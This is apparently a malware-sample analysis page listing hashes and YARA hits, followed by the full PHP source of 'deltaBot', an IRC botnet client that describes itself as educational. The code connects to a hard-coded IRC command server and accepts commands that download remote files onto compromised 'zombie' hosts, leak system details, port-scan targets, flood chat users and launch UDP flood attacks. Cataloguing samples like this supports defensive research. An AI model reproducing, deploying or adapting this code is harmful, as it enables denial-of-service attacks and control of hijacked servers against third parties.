Sample details: 854442ecf2f1b59ac05cad1d28e47611 --

Hashes
MD5: 854442ecf2f1b59ac05cad1d28e47611
SHA1: 661c74476be4bc6d8945775e9c567490392f5792
SHA256: db4cc6ee3bb1c9f8d41201a078941d782d617f1d7e0a6a448c3b5678ba115bae
SSDEEP: 192:0aOJaVxdmGNPVWSORqIaBOPqFwwTBLV2e:0aOJaVnmGNPExhCFRx2e
Details
File Type: PHP
Yara Hits
YRP/domain | YRP/IP | YRP/contentis_base64 | YRP/network_irc | YRP/php_uname |
Parent Files
cbf75d6e77363cf88fd3b8bc8e0adc25
Strings
		# deltaBot v0.1.1
# A simple PHP IRC bot to illustrate the
# inner workings of a traditional botnet.
# By using this script you agree that the
# creator is by no means responsible for
# your actions and cannot be held liable
# for any damage you might inflict to
# third-party property. This file has been
# created for educational purposes only,
# during the writing of an article on
# botnets and information security for
# a magazine publication in Greece.
# Please leave feedback at: bruteforce.gr/deltabot
# This file is distributed under the terms of GPLv3.
//We don't want the bot to stop
set_time_limit(0);
ini_set('display_errors', 'on');
class deltaBot {
	//Do you run it locally or on a (zombie) server?
	var $localhost = TRUE;
	//Bot's version
	var $version = '0.1.1';
	//IRC server connection details
	var $config = array( 
	'server' => '37.59.98.48', 
	'port'   => 1256, 
	'channel' => '#pollo',
	'name'   => 'CAOS PHP Irc Bot',
	'nick'   => 'deltaBot',
	'pass'   => '',
	'maxrand' => 150,
	//Variable to store our IRC connection
	var $conn;
	//Array to save the server/client messages using explode()
	var $ex = array();
	//Function that starts the bot and connects to the IRC server
	function start()
		$this->conn = fsockopen($this->config['server'], $this->config['port'], $e, $s, 30);
		if(strlen($this->config['pass']) > 0)
			$this->send("PASS config['pass']");
		if(!$this->localhost) { 
			$this->send("USER ".$this->config['nick']." ".$_SERVER['SERVER_ADDR']." ".$_SERVER['SERVER_NAME']." :".$this->config['name']); 
		else {
			$this->send("USER deltaBot 127.0.0.1 localhost :".$this->config['name']);
		$this->send("NICK ".$this->config['nick'].mt_rand(0,$this->config['maxrand']));
		$this->join($this->config['channel']);
		$this->main();
	//Bot's main function
	function main()
		while(!feof($this->conn))
			//Take the data from the server and remove \r\n
			$data = trim(fgets($this->conn, 256));
			echo $data;
			flush();
			//Break messages into their components
			$this->ex = explode(' ', $data);
			//Play ping pong with the IRC server to stay connected
			if($this->ex[0] == 'PING')
				$this->send("PONG ".$this->ex[1]); 
			//The 4th word of each message corresponds to the given command
			@$command = $this->ex[3];
			//List of available commands, executable by the bot
			switch($command) 
			{                      
				//Join a channel, syntax: !join <#channel1> [#channel2]
			case ':!join':
				for($i=4; $i<(count($this->ex)); $i++)
					$this->join($this->ex[$i]);
				break;                     
				//Part from a channel, syntax: !part <#channel1> [#channel2]
			case ':!part':
				for($i=4; $i<(count($this->ex)); $i++)
					$this->part($this->ex[$i]);
				break;   
				//Say something to a user/channel, syntax: !say <user/#channel> <message>
			case ':!say':
				$message = "";
				for($i=5; $i<=(count($this->ex)); $i++)
					$message .= $this->ex[$i]." ";
				}		
				$this->send("PRIVMSG ".$this->ex[4]." :$message");
				break;                        		
				//Display the bot's version, syntax: !version
			case ':!version':
				$this->send("PRIVMSG ".$this->config['channel']." :".$this->version);
				break;
				//Display each zombie's uptime, syntax: !uptime
			case ':!uptime':
				$uptime = system("uptime");
				$this->send("PRIVMSG ".$this->config['channel']." :$uptime");
				break;
				//Display information about each zombie's web server, syntax: !server
			case ':!server':
				$software = $_SERVER['SERVER_SOFTWARE'];
				$docroot = $_SERVER['DOCUMENT_ROOT'];
				$this->send("PRIVMSG ".$this->config['channel']." :Server: $software, Document Root: $docroot");
				break;
				//Display system information about each zombie, syntax: !server
			case ':!system':
				$this->send("PRIVMSG ".$this->config['channel']." :".php_uname());
				break;
				//Download a file to each zombie, syntax: !download <URL> [path]
			case ':!download':
				if(!isset($this->ex[4])) 
				{ 
					$this->send("PRIVMSG ".$this->config['channel']." :[--> Please give the file's URL!]");
					break; 
				if(!isset($this->ex[5]))
					$path = '/tmp/file.delta';
				else
					$path = $this->ex[5];
				$this->download($this->ex[4], $path);
				break;
				//Flood a user/channel, syntax: !tsunami <user/#channel> [rounds]
			case ':!tsunami':
				$tsunami = "TSUNAMIIII!! hahah!!";
				if(!isset($this->ex[4])) 
				{ 
					$this->send("PRIVMSG ".$this->config['channel']." :[--> Please give the user/#channel to flood!]");
					break; 
				if(isset($this->ex[5]))
					$rounds = $this->ex[5];
				else
					$rounds = 20;
				$this->send("PRIVMSG ".$this->config['channel']." :[\002Starting Tsunami flood @ ".$this->ex[4]." for $rounds rounds...\002]");
				for($i=0; $i<$rounds; $i++)
					$this->send("PRIVMSG ".$this->ex[4]." :$tsunami");
					sleep(1);
				}		
				$this->send("PRIVMSG ".$this->config['channel']." :[\002Finished Tsunami flood @ ".$this->ex[4]." for $rounds rounds!\002]");
				break;   
				//Scan a host/IP for open ports, syntax: !portscan <host/IP> [comma seperated ports]
			case ':!portscan':
				if(!isset($this->ex[4])) 
				{ 
					$this->send("PRIVMSG ".$this->config['channel']." :[--> Please give the host/IP to scan!]");
					break; 
				$host = $this->ex[4];
				if(isset($this->ex[5]))
					$ports = $this->ex[5];
				else
					$ports = '21,22,23,25,53,80,110,443,445,8080';
				$this->portscan($host, $ports);
				break;
				//Flood a host/IP using UDP packets, syntax: !udpflood <host/IP> [duration]
			case ':!udpflood':
				if(!isset($this->ex[4])) 
				{ 
					$this->send("PRIVMSG ".$this->config['channel']." :[--> Please give the host/IP to flood!]");
					break; 
				$host = $this->ex[4];
				if(isset($this->ex[5]))
					$duration = $this->ex[5];
				else
					$duration = 30; //
				$this->udpflood($host, $duration);
				break;
				//Restart the bot, syntax: !restart
			case ':!restart':
				$this->restart();
				exit;
				//Shutdown the bot, syntax: !shutdown
			case ':!shutdown':
				$this->shutdown();
				exit;
				//Display help, syntax: !help
			case ':!help':
				$this->help();
				break;
	//Sends messages to the IRC server and displays them in the browser
	function send($msg) 
		fputs($this->conn, $msg."\r\n");
		echo '<strong>'.$msg.'</strong><br />';
	//Joins a channel
	function join($channel)
		$this->send("JOIN $channel");
	//Parts from a channel
	function part($channel)
		$this->send("PART $channel");
	//Restarts the bot
	function restart()
		echo "<meta http-equiv=\"refresh\" content=\"5\">";
	//Shutdowns the bot
	function shutdown()
		$this->send("QUIT ".$this->config['name']);
	//Downloads a file to each zombie
	function download($url, $path)
		if(!$fp = fopen($path, "w"))
			$this->send("PRIVMSG ".$this->config['channel']." :[--> You don't have write permissions to $path, please choose another path!]");
		else
			if(!$get = file($url))
				$this->send("PRIVMSG ".$this->config['channel']." :[--> Unable to download file, please check the URL!]");
			else
				$this->send("PRIVMSG ".$this->config['channel']." :[\002Downloading file from $url to $path ...\002]");
				for($i=0; $i<count($get); $i++)
					fwrite($fp, $get[$i]);
				$this->send("PRIVMSG ".$this->config['channel']." :[\002Finished download!\002]");
			fclose($fp);
	//Runs a port scan against a host/IP
	function portscan($host, $ports)
		$port = array();
		$port = explode(',',$ports);
		$this->send("PRIVMSG ".$this->config['channel']." :[\002Starting Port Scan @ ".$host." for ".(count($port))." ports...\002]");
		for($i=0; $i<(count($port)); $i++)
			$fp = @fsockopen($host, $port[$i], $e, $s, 10);
			if($fp)
				$this->send("PRIVMSG ".$this->config['channel']." :[Port ".$port[$i]." @ ".$host." is OPEN]");
				fclose($fp);
			else
				$this->send("PRIVMSG ".$this->config['channel']." :[Port ".$port[$i]." @ ".$host." is CLOSED]");
		$this->send("PRIVMSG ".$this->config['channel']." :[\002Finished Port Scan @ ".$host." for ".(count($port))." ports!\002]");		
	//Executes a UDP flood attack against a host/IP
	function udpflood($host, $duration)
		$packet = "";
		for($i=0; $i<256; $i++)
			$packet .= chr(mt_rand(0,255));
		$this->send("PRIVMSG ".$this->config['channel']." :[\002Starting UDP flood attack @ $host for $duration seconds...\002]");
		$max_time = time() + $duration;
		while(time() < $max_time) 
			if($fp = fsockopen('udp://'.$host, mt_rand(0,8080), $e, $s, 5))
				fwrite($fp, $packet);
				fclose($fp);
		$this->send("PRIVMSG ".$this->config['channel']." :[\002Finished UDP flood attack @ $host !\002]");
	//Displays available bot commands
	function help()
		$this->send("PRIVMSG ".$this->config['channel']." :[\002List of available commands\002]");
		$this->send("PRIVMSG ".$this->config['channel']." :[!say, !join, !part, !restart, !shutdown]");
		$this->send("PRIVMSG ".$this->config['channel']." :[!download, !tsunami, !portscan !udpflood]");
		$this->send("PRIVMSG ".$this->config['channel']." :[!uptime, !server, !system !version !help]");
//Create the bot and start it
$bot = new deltaBot;
$bot->start();